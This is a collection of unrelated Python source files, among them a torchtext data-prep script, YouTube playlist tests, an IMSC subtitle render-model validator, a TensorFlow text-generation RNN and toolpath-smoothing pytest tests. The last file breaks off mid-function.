from torchtext.utils import download_from_url, extract_archive
from torchtext.datasets.text_classification import URLS
import sys
import logging
def run_pipeline(input_options):
"""
This method downloads the dataset and extract it along with the vocab file
:param input_options: Input arg parameters
"""
dataset_tar = download_from_url(
URLS["AG_NEWS"], root=input_options["output"])
extracted_files = extract_archive(dataset_tar)
if not os.path.isfile(input_options["VOCAB_FILE"]):
filePointer = requests.get(
input_options["VOCAB_FILE_URL"], allow_redirects=True)
if filePointer.ok:
with open(input_options["VOCAB_FILE"], "wb") as f:
f.write(filePointer.content)
else:
raise RuntimeError("Error in fetching the vocab file")
def PrintOptions(options):
"""
Logging for debugging
"""
for a in options.items():
print(a)
def run_pipeline_component(options):
"""
Method called from entry point to execute the pipeline
"""
print("Running data prep job from container")
logging.getLogger().setLevel(logging.INFO)
PrintOptions(options)
run_pipeline(
options
)
# if __name__ == "__main__":
# run_pipeline_component({
# "output": "./",
# "VOCAB_FILE": "bert_base_uncased_vocab.txt",
# "VOCAB_FILE_URL": "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt"
# })
| 2.671875 | 3 |
test.py | 12beesinatrenchcoat/yt-playlist-discord-webhook | 2 | 12796568 | <filename>test.py<gh_stars>1-10
# Unit tests, I guess.
import unittest
import typing
import main
# A test playlist created by myself to test various features of the script.
# It contains five videos, added by two different users,
# and some videos don't have maxres thumbnails.
# This playlist shouldn't be changed.
TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb'
# Testing functions revolving around YouTube and video filtering.
class TestVideoFunctions(unittest.TestCase):
def test_get_playlist_items(self):
r = main.get_playlist_items(TEST_PLAYLIST)
self.assertEqual(len(r['items']), 5)
def test_filter_items_by_timestamp(self):
r = main.get_playlist_items(TEST_PLAYLIST)
filtered = main.filter_playlist_items_by_timestamp(r, 1617985920)
self.assertEqual(len(filtered), 2)
# Not a test, but used in tests below.
def get_playlist_item_embed(pos: int):
r = main.get_playlist_items(TEST_PLAYLIST)
playlist_item = r['items'][pos]
epoch = main.iso_string_to_epoch(playlist_item
['snippet']['publishedAt'])
playlist_item['snippet']['publishedAt'] = epoch
embed = main.video_info_to_embed(playlist_item)
return embed
# Testing stuff with the Discord Embeds.
class TestEmbeds(unittest.TestCase):
def test_maxres_thumbnail(self):
embed = get_playlist_item_embed(1)
self.assertRegex(embed.thumbnail['url'], '(maxresdefault)')
def test_hq_thumbnail_when_no_maxres(self):
embed = get_playlist_item_embed(2)
self.assertRegex(embed.thumbnail['url'], '(hqdefault)')
if __name__ == '__main__':
unittest.main()
| 2.71875 | 3 |
src/main/python/imschrm/hrm.py | sandflow/imscHRM | 3 | 12796569 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2021, Pearl TV LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Hypothetical Render Model (HRM)'''
__author__ = "<NAME> <<EMAIL>>"
import typing
from dataclasses import dataclass
from fractions import Fraction
from numbers import Number
import logging
import ttconv.isd
import ttconv.style_properties as styles
import ttconv.model
from ._gcpy_codepoints import GCPY_12
LOGGER = logging.getLogger(__name__)
_BDRAW = 12
_GCPY_BASE = 12
_GCPY_OTHER = 3
_REN_G_CJK = 0.6
_REN_G_OTHER = 1.2
_NGBS = 1
_IPD = 1
@dataclass
class ISDStatistics:
dur: Number = 0 # HRM ISD time
dur_d: Number = 0 # HRM background drawing time
nbg_total: Number = 0 # Number of backgrounds drawn
clear: bool = False # Whether the root container had to be cleared
dur_t: Number = 0 # HRM text drawing time
ngra_t: Number = 0 # Total Normalized Rendered Glyph Area
gcpy_count: Number = 0 # Total number of glyphs copied
gren_count: Number = 0 # Total number of glyphs rendered
is_empty: bool = False # Does the ISD contain any content
class EventHandler:
'''Allows a callee to inform the caller of events that occur during processing. Typically
overridden by the caller.
'''
@staticmethod
def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
return (
f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n"
f" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n"
f" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n"
)
def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):
'''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.
`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose
active interval starts at `begin` seconds and ends immediately before the `begin` value of the next
ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`.
'''
hrm = HRM()
last_offset = 0
is_last_isd_empty = True
for doc_index, (time_offset, isd) in enumerate(isd_iterator):
if time_offset < last_offset:
raise RuntimeError("ISDs are not in order of increasing offset")
stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)
avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset
if stats.dur > avail_render_time:
event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats)
if stats.ngra_t > 1:
event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats)
event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats)
if not (stats.is_empty and is_last_isd_empty):
last_offset = time_offset
is_last_isd_empty = stats.is_empty
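# Rough usage sketch (assumption: the ttconv calls below exist with these
# signatures; they are not part of this module):
#
# import xml.etree.ElementTree as et
# import ttconv.imsc.reader, ttconv.isd
#
# doc = ttconv.imsc.reader.to_model(et.parse("captions.ttml"))
# isds = ((t, ttconv.isd.ISD.from_model(doc, t))
#         for t in sorted(ttconv.isd.ISD.significant_times(doc)))
# validate(isds)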
@dataclass(frozen=True)
class _Glyph:
char: str
color : styles.ColorType
font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]
font_size: styles.LengthType
font_style: styles.FontStyleType
font_weight: styles.FontWeightType
text_decoration: styles.TextDecorationType
text_outline: styles.TextOutlineType
text_shadow: styles.TextShadowType
background_color: styles.ColorType
class HRM:
def __init__(self):
self.back_buffer: typing.Set[_Glyph] = set()
self.isd_stats: ISDStatistics = None
def next_isd(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
) -> ISDStatistics:
self.isd_stats = ISDStatistics()
self._compute_dur_t(isd, index_n)
self._compute_dur_d(isd, index_n, is_last_isd_empty)
self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d
return self.isd_stats
def _compute_dur_d(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
):
self.isd_stats.is_empty = True
draw_area = 0 if index_n == 0 or is_last_isd_empty else 1
self.isd_stats.clear = draw_area != 0
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
self.isd_stats.is_empty = False
nbg = 0
for element in region.dfs_iterator():
# should body elements really be excluded? -> NO
# should transparent backgrounds really be counted? -> NO
# should span and br really be included -> yes for now
# should br really be included -> no
if isinstance(element, ttconv.model.Br):
continue
bg_color = element.get_style(styles.StyleProperties.BackgroundColor)
if bg_color is not None:
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] != 0:
nbg += 1
draw_area += _region_normalized_size(region) * nbg
self.isd_stats.nbg_total += nbg
self.isd_stats.dur_d = draw_area / _BDRAW
def _compute_dur_t(
self,
isd: typing.Type[ttconv.isd.ISD],
_index_n: int
):
front_buffer = set()
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
for element in region.dfs_iterator():
if not isinstance(element, ttconv.model.Text):
continue
parent = element.parent()
nrga = _compute_nrga(element)
for char in element.get_text():
glyph = _Glyph(
char=char,
color=parent.get_style(styles.StyleProperties.Color),
font_family=parent.get_style(styles.StyleProperties.FontFamily),
font_size=parent.get_style(styles.StyleProperties.FontSize),
font_style=parent.get_style(styles.StyleProperties.FontStyle),
font_weight=parent.get_style(styles.StyleProperties.FontWeight),
text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),
text_outline=parent.get_style(styles.StyleProperties.TextOutline),
text_shadow=parent.get_style(styles.StyleProperties.TextShadow),
background_color=parent.get_style(styles.StyleProperties.BackgroundColor)
)
if glyph in front_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.gcpy_count += 1
elif glyph in self.back_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gcpy_count += 1
else:
self.isd_stats.dur_t += nrga / _compute_ren_g(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gren_count += 1
front_buffer.add(glyph)
self.back_buffer = front_buffer
def _compute_nrga(element: typing.Type[ttconv.model.Text]):
font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)
if font_size.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported fontSize units: {font_size.units}")
return font_size.value * font_size.value / 10000
def _compute_ren_g(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER
def _compute_gcpy(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER
def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):
region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)
if region_extent.width.units is not styles.LengthType.Units.rw:
raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}")
if region_extent.height.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}")
return region_extent.width.value * region_extent.height.value / 10000
def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):
'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region
'''
if region.get_style(styles.StyleProperties.Opacity) == 0:
return False
if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:
return False
if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none:
return False
if region.has_children():
return True
if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:
return False
bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] == 0:
return False
return True
| 1.507813 | 2 |
month02/multiprocessing/day13-2/myprocess.py | chaofan-zheng/python_learning_code | 4 | 12796570 | <reponame>chaofan-zheng/python_learning_code<gh_stars>1-10
"""
Custom process class
"""
from multiprocessing import Process
# Create your own process class using an object-oriented approach
class MyProcess(Process):
def __init__(self,value):
self.value = value
super().__init__() # call the parent class constructor
def fun(self):
print(self.value)
# Entry point for the work the process executes
def run(self):
self.fun()
print("搞点大事情,想干嘛都行")
my_process = MyProcess(3)
# Start the process; the work is dispatched through the run() entry point
my_process.start()
my_process.join()
# class Process:
# def __init__(self,target):
# self._target = target
#
# def run(self):
# self._target()
#
# def start(self):
# # 创建进程
# self.run() | 3.96875 | 4 |
exe066a.py | Alexmachado81/ExerciciosPython_Resolvidos | 0 | 12796571 | soma = cont =0
while True:
numero = int(input('Enter an integer [type 999 to stop]: '))
if numero == 999:
break
soma = soma + numero
cont += 1
print(f'The sum of the {cont} numbers entered is {soma}')
| 3.765625 | 4 |
examples/resources/football_court/court_image.py | ereide/pyga-camcal | 5 | 12796572 | <gh_stars>1-10
import os
import numpy as np
from interface.camera_calibration import ModelImage
dir_path = os.path.dirname(os.path.realpath(__file__))
class FootballManCityCourtImage2(ModelImage):
def __init__(self):
alpha = 13000
self.K = np.matrix([[alpha, 0.0, 800],
[0.0, alpha, 400],
[0.0, 0.0, 1.0]])
#Currently not used
self.distortion_coeff = None
self.lines = None
self.lines_img_ga = None
self.img_name = os.path.join(dir_path, "rgb_goal_line_MCity_2.png")
def set_lines(self):
goal_bot_left_corner = np.array([162 , 466, 1])
goal_bot_right_corner = np.array([932, 436, 1])
goal_top_left_corner = np.array([698 , 111, 1])
goal_top_right_corner = np.array([1442, 110, 1])
goal_left_back_corner = np.array([1, 141, 1])
goal_right_back_corner = np.array([721, 37, 1])
#keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1])
keeper_box_back_right = np.array([1421, 419, 1])
#keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1])
keeper_box_front_right = np.array([1592, 732, 1])
penalty_area_back_left = np.array([ 1, 465, 1])
penalty_area_back_right = np.array([1592, 408, 1])
#penalty_area_front_left =
#penalty_area_front_right =
back_line = (penalty_area_back_left, penalty_area_back_right)
goal_top_bar = (goal_top_left_corner, goal_top_right_corner)
goal_left_bar = (goal_bot_left_corner, goal_top_left_corner)
goal_right_bar = (goal_bot_right_corner, goal_top_right_corner)
goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner)
goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner)
#keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left)
keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right)
#keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right)
#penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left)
#penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right)
#penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right)
goal_lines = {"back_line": back_line,
"goal_top_bar": goal_top_bar,
"goal_left_bar" : goal_left_bar,
"goal_right_bar": goal_right_bar,
"goal_left_back_line": goal_left_back_line,
"goal_right_back_line": goal_right_back_line}
keeper_box_lines = {"keeper_box_right_line": keeper_box_right_line}
penalty_box_lines = {}
self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines}
return self.lines
| 2.203125 | 2 |
0845 Enclosed Islands.py | ansabgillani/binarysearchcomproblems | 1 | 12796573 | <filename>0845 Enclosed Islands.py
class Solution:
def solve(self, matrix):
total = sum(sum(row) for row in matrix)
escapable = 0
seen = set()
for r in range(len(matrix)):
for c in [0,len(matrix[0])-1]:
if (r,c) in seen or matrix[r][c] != 1:
continue
seen.add((r,c))
dfs = [[r,c]]
while dfs:
cr,cc = dfs.pop()
escapable += 1
for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:
if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:
dfs.append([nr,nc])
seen.add((nr,nc))
for r in [0,len(matrix)-1]:
for c in range(len(matrix[0])):
if (r,c) in seen or matrix[r][c] != 1:
continue
seen.add((r,c))
dfs = [[r,c]]
while dfs:
cr,cc = dfs.pop()
escapable += 1
for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:
if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:
dfs.append([nr,nc])
seen.add((nr,nc))
return total - escapable
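# Illustrative check: the single land cell below touches no border, so it cannot
# escape and the count of enclosed land cells is 1.
# Solution().solve([[0, 0, 0],
#                   [0, 1, 0],
#                   [0, 0, 0]])  # -> 1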
| 2.9375 | 3 |
tv-script-generation/full_test/neural_network.py | AlphaGit/deep-learning | 0 | 12796574 | <filename>tv-script-generation/full_test/neural_network.py
import tensorflow as tf
import timeit
import datetime
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from tensorflow.contrib import seq2seq
class NeuralNetwork():
def get_inputs(self):
p_input = tf.placeholder(tf.int32, [None, None], name="input")
p_targets = tf.placeholder(tf.int32, [None, None], name="targets")
p_learning_rate = tf.placeholder(tf.float32, name="learning_rate")
return (p_input, p_targets, p_learning_rate)
def get_init_cell(self, batch_size, rnn_size, layer_count=2):
basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count)
initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name="initial_state")
return (multi_rnn_cell, initial_state)
def get_embed(self, input_data, vocab_size, embed_dim):
embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1))
return tf.nn.embedding_lookup(embedding, input_data)
def build_rnn(self, cell, inputs):
outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)
final_state = tf.identity(final_state, name="final_state")
return (outputs, final_state)
def build_nn(self, cell, rnn_size, input_data, vocab_size):
embed_layer = self.get_embed(input_data, vocab_size, rnn_size)
rnn, final_state = self.build_rnn(cell, embed_layer)
fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None)
tf.summary.histogram('fully_connected', fully_connected)
return (fully_connected, final_state)
def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir):
self.train_graph = tf.Graph()
with self.train_graph.as_default():
vocab_size = len(int_to_vocab)
self.input_text, self.targets, self.lr = self.get_inputs()
input_data_shape = tf.shape(self.input_text)
cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count)
logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size)
# Probabilities for generating words
probs = tf.nn.softmax(logits, name='probs')
# Loss function
self.cost = seq2seq.sequence_loss(
logits,
self.targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
tf.summary.scalar('train_loss', self.cost)
# Optimizer
optimizer = tf.train.AdamOptimizer(self.lr)
# Gradient Clipping
gradients = optimizer.compute_gradients(self.cost)
capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients]
self.train_op = optimizer.apply_gradients(capped_gradients)
self.merged_summaries = tf.summary.merge_all()
self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph)
def run_train_epoch(self, sess, batches, learning_rate, epoch_i):
# Unused stub: the per-epoch training loop is implemented inline in train_model.
raise NotImplementedError
def save_trained_model(self, sess, save_dir, epoch_number):
saver = tf.train.Saver()
full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number)
if not os.path.exists(full_save_directory):
os.makedirs(full_save_directory)
saver.save(sess, full_save_directory)
print('Model trained and saved to {}.'.format(full_save_directory))
def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length):
print('Generating new text with prime word: {}'.format(prime_word))
test_final_state, test_probs = self.get_tensors(train_graph)
gen_sentences = [prime_word + ':']
prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])})
for n in range(gen_length):
# Dynamic Input
dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]]
dyn_seq_length = len(dyn_input[0])
# Get Prediction
probabilities, prev_state = sess.run(
[test_probs, test_final_state],
{self.input_text: dyn_input, initial_state: prev_state})
pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab)
gen_sentences.append(pred_word)
# Remove tokens
tv_script = ' '.join(gen_sentences)
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
tv_script = tv_script.replace(' ' + token.lower(), key)
tv_script = tv_script.replace('\n ', '\n')
tv_script = tv_script.replace('( ', '(')
return tv_script
def get_tensors(self, loaded_graph):
final_state_tensor = loaded_graph.get_tensor_by_name("final_state:0")
probabilities_tensor = loaded_graph.get_tensor_by_name("probs:0")
return (final_state_tensor, probabilities_tensor)
def pick_word(self, probabilities, int_to_vocab):
to_choose_from = list(int_to_vocab.values())
return np.random.choice(to_choose_from, p=probabilities)
def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length):
with tf.Session(graph=self.train_graph) as sess:
sess.run(tf.global_variables_initializer())
#print('Train graph:', train_graph.get_operations())
print('Running {} batches per epoch.'.format(len(batches)))
all_start_time = timeit.default_timer()
for epoch_i in range(num_epochs):
state = sess.run(self.initial_state, {self.input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
self.input_text: x,
self.targets: y,
self.initial_state: state,
self.lr: learning_rate}
train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed)
print('Ran batch {}'.format(batch_i))
summary = sess.run(self.merged_summaries, feed)
self.train_writer.add_summary(summary, epoch_i)
last_end_time = timeit.default_timer()
total_seconds_so_far = last_end_time - all_start_time
total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far)
estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far)
print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}'
.format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish))
if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1):
self.save_trained_model(sess, save_dir, epoch_i + 1)
if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1):
test_final_state, test_probs = self.get_tensors(self.train_graph)
tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length)
print("*********************************************************************************************")
print(tv_script)
print("*********************************************************************************************")
| 2.484375 | 2 |
vibration_compensation/tests/test_smoothed_toolpath.py | fredizzimo/VibrationCompensation | 0 | 12796575 | import os
from vibration_compensation import read_gcode, Data
import pytest
from numpy.testing import *
import numpy as np
import scipy as sp
import vibration_compensation.bokeh_imports as plt
@pytest.fixture(scope="module")
def figures():
path, filename = os.path.split(os.path.realpath(__file__))
path = os.path.join(path, "output")
os.makedirs(path, exist_ok=True)
plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + ".html"))
ret = []
yield ret
plt.save(ret)
def generate_curves(gcode, maximum_error):
data = read_gcode(gcode, maximum_error)
return data
@pytest.fixture(scope="function")
def plotter(figures, request):
def plot(data: Data):
p = plt.Figure(
plot_width=1000,
plot_height=1000,
x_range=(-250, 250),
y_range=(-250, 250),
match_aspect=True,
lod_threshold=None,
title=request.node.name
)
p.segment(
x0=data.start_xy[:, 0],
x1=data.end_xy[:, 0],
y0=data.start_xy[:, 1],
y1=data.end_xy[:, 1],
line_width=1,
line_color="red",
line_dash="dotted"
)
ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)
points = data.smoothed_toolpath(ts)
p.line(
points[:,0],
points[:,1],
line_width=2,
line_color="blue",
line_dash="solid"
)
p.circle(
points[:,0],
points[:,1],
size=4,
fill_color="white"
)
figures.append(p)
return plot
def point_on_line(linea, lineb, point):
    # Zero iff `point` lies on the segment from linea to lineb (triangle equality).
    return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\
        - np.linalg.norm(linea - lineb)
def point_on_middle_of_line(linea, lineb, point):
    # Distance from `point` to the midpoint of the segment from linea to lineb.
    mid = (lineb - linea) * 0.5 + linea
    return np.linalg.norm(point - mid)
class SegmentChecker(object):
def __init__(self,data, l, s, start, end, corner):
self.data = data
self.s = s
self.start = start
self.end = end
self.start_point = data.start_xy[l]
self.end_point = data.end_xy[l]
if l != data.start_xy.shape[0] - 1:
self.next_start_point = data.start_xy[l+1]
self.next_end_point = data.end_xy[l+1]
self.spline = data.smoothed_toolpath
if corner:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_mid = l + 1.0
self.spline_end = data.smoothed_toolpath.segment_end[s]
else:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_end = data.smoothed_toolpath.segment_end[s]
self.spline_mid = (self.spline_start + self.spline_end) / 2.0
xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)
self.start_line_dist = np.sum(xy_lengths[:l])
self.line_length = xy_lengths[l]
if l < data.start_xy.shape[0] - 1:
self.start_next_line_dist = self.start_line_dist + self.line_length
self.next_line_length = xy_lengths[l+1]
def check_distance(self, spline, line):
msg = "The spline start distance does not match"
if line <= 1.0:
line_dist = self.start_line_dist + self.line_length * line
else:
line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)
assert self.spline.distance(spline) <= line_dist and \
self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \
msg
def check_start_point_start(self):
msg = "The start point of the spline segment does not match the line start point"
assert_array_almost_equal(self.spline(self.spline_start), self.start_point,
err_msg=msg)
self.check_distance(self.spline_start, 0)
def check_start_point_on(self):
msg = "The start point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \
pytest.approx(0, abs=1e-12), msg
def check_line_start_point_middle(self):
msg = "The start point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg
self.check_distance(self.spline_start, 0.5)
def check_line_start_point_end(self):
msg = "The start point of the spline segment is not on the end of the line"
assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)
self.check_distance(self.spline_start, 1.0)
def check_point_on_middle_of_line(self):
msg = "The middle point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
self.check_distance(self.spline_mid, 0.5)
def check_point_on_line(self):
msg = "The middle point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
def check_end_point_end(self):
msg = "The end point of the spline segment does not match the line end point"
        assert_array_almost_equal(self.spline(self.spline_end), self.end_point, err_msg=msg)
self.check_distance(self.spline_end, 1.0)
end_error_segment = "The end point of the spline segment is not on the line"
def check_end_point_on(self):
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \
pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment
def check_corner_end_point_on(self):
assert point_on_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\
SegmentChecker.end_error_segment
end_error_segment_middle = "The end point of the spline segment is not on the middle of the line"
def check_end_point_middle(self):
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 0.5)
def check_corner_end_point_middle(self):
assert point_on_middle_of_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 1.5)
def check_continuity(self):
msg = "There's a discontinuity at the end of the spline segment"
if self.s > 0:
prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]
assert prev_end == self.spline_start, \
"The previous segment does not end where the current one starts"
assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),
err_msg=msg)
assert self.spline.distance(self.spline_start-1e-12) <=\
self.spline.distance(self.spline_start) and \
self.spline.distance(self.spline_start-1e-12) == \
pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \
"The previous segment end distance and the current segment start do not match up"
def check_corner_spline_order(self):
assert self.spline_end > self.spline_mid, \
"The endpoint of the corner spline is before the line segment end"
corner_error = "The closest point of the corner is not close enough"
def check_corner_middle_normal(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def check_corner_middle_short(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\
pytest.approx(0.01, abs=1e-12), \
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def straight_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, False)
if start == "start":
checker.check_start_point_start()
elif start == "on":
checker.check_start_point_on()
elif start == "middle":
